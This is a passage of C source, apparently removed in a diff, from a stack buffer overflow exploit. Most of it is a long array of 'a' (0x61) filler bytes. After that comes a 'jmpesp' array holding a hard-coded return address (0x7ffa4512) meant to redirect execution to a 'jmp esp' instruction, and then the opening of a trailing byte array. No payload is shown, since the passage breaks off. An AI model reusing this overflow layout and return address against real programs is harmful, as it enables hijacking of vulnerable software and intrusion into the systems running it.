0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 
0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 
0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 
0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, - 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61 -}; - -unsigned char jmpesp[] ={ //jmpesp=0x7ffa4512; - 0x12, 0x45, 0xfa, 0x7f -}; - -unsigned char end[] = { - 0x32, 0x33, 0x34, 0x35, 0x36, - 0x37, 0x38, 0x39, 0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 
